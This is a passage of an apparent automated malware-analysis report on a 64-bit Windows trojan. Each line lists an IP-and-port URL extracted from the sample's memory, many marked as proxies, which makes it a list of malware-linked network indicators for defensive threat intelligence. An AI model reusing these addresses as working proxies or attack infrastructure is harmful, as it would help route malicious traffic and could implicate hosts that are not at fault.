                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.99.160.98:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.99.203.179:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.99.203.179:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.230.243:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.230.243:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.242.11:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.242.11:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.255.177:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.255.177:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.255.177:5678HJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.113.118:23128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.113.118:23128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.157.114:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.157.114:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.172.154:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.172.154:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:2706
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:2706://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:39993
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:39993://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:53299
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:53299://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA90F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:58899
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:58899://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.157.82.187:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.157.82.187:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.159.39.153:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.159.39.153:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.162.202.44:1305
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.162.202.44:1305://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.165.42.166:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.165.42.166:3128://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.176.134.67:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.176.134.67:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.18.248.104:49153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.18.248.104:49153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.207.11.148:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.207.11.148:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.196.177:9999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.196.177:9999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.48.23:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.48.23:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.48.80:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.48.80:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.98.200:44550
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.98.200:44550://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.213.24.233:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.213.24.233:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.214.80.
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.214.80.27:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.214.80.27:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.22.121.196:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.22.121.196:1080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.23.192.249:8901
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.23.192.249:8901://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.246.151:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.246.151:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.246.53:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.246.53:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.249.218.34:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.249.218.34:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A72000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.250.158.81:62581
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.250.158.81:62581://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.252.170.222:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.252.170.222:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.252.189.2:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.252.189.2:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.253.208.146:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.253.208.146:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.254.157.214:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.254.157.214:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.254.168.12:4782
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.254.168.12:4782://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.32.141.50:18472
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.32.141.50:18472://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.32.143.55:32048
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.32.143.55:32048://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.162.89:50682
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.162.89:50682://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.162.89:56884
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.162.89:56884://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDC0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.162.89:58020
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.162.89:58020://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.156:5987
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.156:5987://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA52D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA51E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.156:7579
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA51E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.156:7579://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7929000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C795B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.167.180:31633
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C795B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.167.180:31633://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.167.180:64305
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.167.180:64305://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.252.189:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.252.189:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.49.14.57:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.49.14.57:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.54.21.203:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.54.21.203:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.62.103.49:8587
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.62.103.49:8587://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA533000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.62.226.96:26546
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.62.226.96:26546://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.62.229.28:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.62.229.28:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EEE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.65.171.6:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.65.171.6:8080://proxyxD
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:23798
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:23798://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:29563
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:29563://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:41921
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:41921://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:44055
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:44055://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:55014
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.165.164:55014://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.168.188:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.79.168.188:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.0.176.4:3180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.0.176.4:3180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C654C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.133.33:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C654C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.133.33:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.17:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.17:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.198.35:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.198.35:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.85.202:999
